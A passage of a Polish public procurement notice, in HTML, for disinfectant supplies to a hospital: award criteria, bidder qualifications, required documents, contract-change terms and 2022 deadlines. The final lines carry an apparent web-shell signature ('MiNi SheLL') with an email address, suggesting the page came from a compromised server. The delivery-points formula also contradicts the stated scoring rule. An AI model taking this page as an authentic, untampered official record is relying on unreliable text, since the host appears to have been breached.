całkowitych.<br/>Termin zapłaty nie może być krótszy niż 30 dni oraz dłuższy niż 60 dni zgodnie z art. 8 ust. 3 ustawy <br/>o terminach zapłaty w transakcjach handlowych. Zamawiający wskazuje, iż uzasadnieniem zastosowania dłuższego terminu zapłaty są okoliczności związane z zasadami finansowania Zmawiającego przez publicznego płatnika jakim jest NFZ z tytułu prowadzonej działalności leczniczej stanowiącej podstawową działalność Zamawiającego. <br/>C.	Kryterium „Termin dostawy” w dniach:<br/>a)	znaczenie kryterium - 20% (20 pkt); (minimalny termin wynosi 2 dni)<br/>b)	opis sposobu oceny ofert dla kryterium „Termin dostawy”: <br/>TD = (OT / OTmin) x 20 pkt <br/>gdzie:<br/>TD - liczba uzyskanych punktów dla kryterium „Termin dostawy” ocenianej oferty<br/>OT – termin dostawy w ofercie ocenianej <br/>OTmin – termin dostawy w ofercie z najkrótszym terminem dostawy<br/>Wykonawca oferuje termin dostawy mieszczący się w przedziale od 2 do 5 dni. Najkrótszy proponowany termin dostawy otrzyma maksymalną ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN ZAPŁATY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN DOSTAWY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu:<br/>1) zdolność do występowania w obrocie gospodarczym – Zamawiający nie precyzuje warunku udziału <br/>w postępowaniu;<br/>2) uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów - Zamawiający nie precyzuje warunku udziału w postępowaniu;<br/>3) sytuacja ekonomiczna lub finansowa – Zamawiający nie precyzuje warunku udziału w postępowaniu;<br/>4) zdolność techniczna lub zawodowa – Określone przez Zamawiającego w ogłoszeniu o zamówieniu i SWZ.<br/>7.1.1.Wykonawca spełni warunek dotyczący zdolności technicznej lub zawodowej, jeżeli wykaże, że: wykonała w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: <br/>Pakiet nr 1 - co najmniej 2 dostawy środków dezynfekcyjnych, każda o wartości nie niższej niż 70 000,00 PLN brutto<br/><br/>Pakiet nr 2 - co najmniej 2 dostawy środków dezynfekcyjnych, każda o wartości nie niższej niż 10 000,00 PLN brutto<br/><br/>Pakiet nr 3 - co najmniej 2 dostawy środków dezynfekcyjnych, każda o wartości nie niższej niż 25 000,00 PLN brutto<br/><br/>Pakiet nr 4 - co najmniej 2 dostawy środków dezynfekcyjnych, każda o wartości nie niższej niż 20 000,00 PLN brutto<br/><br/>Pakiet nr 5 - co najmniej 2 dostawy środków dezynfekcyjnych, każda o wartości nie niższej niż 10 000,00 PLN brutto<br/><br/>Pakiet nr 6 – co najmniej 2 dostawy środków dezynfekcyjnych, każda o wartości nie niższej niż 1 000,00 PLN brutto<br/><br/>Pakiet nr 7 – co najmniej 2 dostawy środków dezynfekcyjnych, każda o wartości nie niższej niż 10 000,00 PLN brutto<br/><br/>W przypadku składania ofert na więcej niż 1 pakiet wartość wykonanych dostaw nie może być niższa niż suma kwot dla danych pakietów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu zamawiający żąda następujących dokumentów:<br/>1)	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>2)	oświadczenia wykonawcy zgodnie z załącznikiem nr 6 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunku dotyczącego zdolności technicznej lub zawodowej określonego Zamawiający żąda od wykonawcy (Wykonawca składa na wezwanie Zamawiającego):<br/>a)	Oświadczenia o zakresie zrealizowanych dostaw wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert zgodnie z załącznikiem nr 5 do SWZ, a przed podpisaniem umowy Zamawiający wezwie Wykonawcę do złożenia dokumentu stanowiącego wykaz zrealizowanych zamówień wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest <br/>w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy<br/>Jeżeli w dokumentach składanych w celu potwierdzenia spełniania warunków udziału w postępowaniu, kwoty będą wyrażane w walucie obcej, kwoty te zostaną przeliczone na PLN wg średniego kursu PLN w stosunku do walut obcych ogłaszanego przez Narodowy Bank Polski (Tabela A kursów średnich walut obcych) w dniu zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> . PRZEDMIOTOWE ŚRODKI DOWODOWE:<br/>8.1.1 Zamawiający żąda złożenia, wraz z ofertą, przedmiotowych środków dowodowych – na potwierdzenie zgodności oferowanych dostaw z wymaganiami określonymi w opisie przedmiotu zamówienia:<br/>a)	Oświadczenie o posiadaniu przez zaoferowany przedmiot zamówienia aktualnych dopuszczeń do obrotu <br/>i używania dla wyrobów medycznych zgodnie z ustawą z dnia 20 maja 2010 o wyrobach medycznych (t.j. <br/>Dz. U. z 2021r., poz. 1556.) – załącznik nr 8 do SWZ,<br/>b)	materiały informacyjne (opisy, katalogi) oferowanego przedmiotu zamówienia w języku polskim potwierdzające spełnienie wymagań określonych przez Zamawiającego w Załączniku nr 1 do SWZ ( Szczegółowy opis przedmiotu zamówienia). W przypadku kiedy zaoferowane wyroby będą budzić wątpliwości Zamawiającego co do ich zgodności z opisem przedmiotu zamówienia zawartym w SWZ, Zamawiający w celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym w SWZ zastrzega prawo żądania próbek wszystkich zaoferowanych wyrobów.<br/>c)	certyfikat CE lub deklaracja zgodności CE stwierdzającą zgodność z dyrektywą 93/42/EEC lub dokument potwierdzający zgłoszenie wyrobu medycznego do Prezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych zwanego dalej Prezesem Urzędu.<br/>d)	w przypadku produktów, które nie podlegają przepisom ustawy z dnia 20 maja 2010 r. o Wyrobach Medycznych, Wykonawca zobowiązany jest dołączyć do oferty inne niż wyżej wymienione, odpowiednie dokumenty dopuszczające te produkty do obrotu i ich stosowania. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są niekompletne, Zamawiający wzywa do ich złożenia lub uzupełnienia w wyznaczonym terminie.<br/>Zamawiający wezwie do ich złożenia lub uzupełnienia, jeżeli przedmiotowy środek dowodowy służy potwierdzeniu zgodności z kryteriami określonymi w opisie kryteriów oceny ofert lub gdy mimo złożenia przedmiotowego środka dowodowego oferta podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Warunki zmiany umowy:<br/>Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy. Zamawiający przewiduje możliwość zmiany umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego, a także dotyczą: <br/>a)	zmiany ilości zamawianego asortymentu przy zachowaniu cen jednostkowych zgodnych z ofertą Wykonawcy,<br/>b)	obniżenia cen w stosunku do cen ofertowych przez Wykonawcę, <br/>c)	zmiany numeru katalogowego produktu lub jego nazwy przy zachowaniu tożsamości dostarczanego produktu i jego cech jakościowych nie gorszych niż produkt zaoferowany w ofercie,<br/>d)	zmiany danych Stron umowy(np. zmiana siedziby, adresu, nazwy),<br/>e)	działania siły wyższej lub wystąpienia stanu wyższej konieczności,<br/>f)	zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe, zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia,<br/>g)	zastąpienie wyrobu objętego umową odpowiednikiem w przypadku zaprzestania wytwarzania wyrobu objętego umową z zachowaniem ceny jednostkowej,<br/>h)	zmiany numerów katalogowych produktów w przypadku aktualizacji katalogów przez producenta, a także <br/>w zakresie zmiany produktu przy zachowaniu nazwy międzynarodowej jeżeli produkt objęty ofertą został wstrzymany w produkcji lub wycofany, przy zachowaniu ceny jednostkowej.<br/>i)	stawki podatku od towarów i usług – zmiana taka nie wymaga aneksu do umowy i następuje automatycznie z dniem zmiany stawek podatków od towarów i usług;<br/>j) Zamawiający dopuszcza zmiany umowy określone w art. 455 PZP <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-13 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov,pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-13 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Oświadczenie dotyczące przepisów sankcyjnych spowodowanych wojna na Ukrainie zawarte jest w załączniku nr 9 do SWZ

Creat By MiNi SheLL
Email: jattceo@gmail.com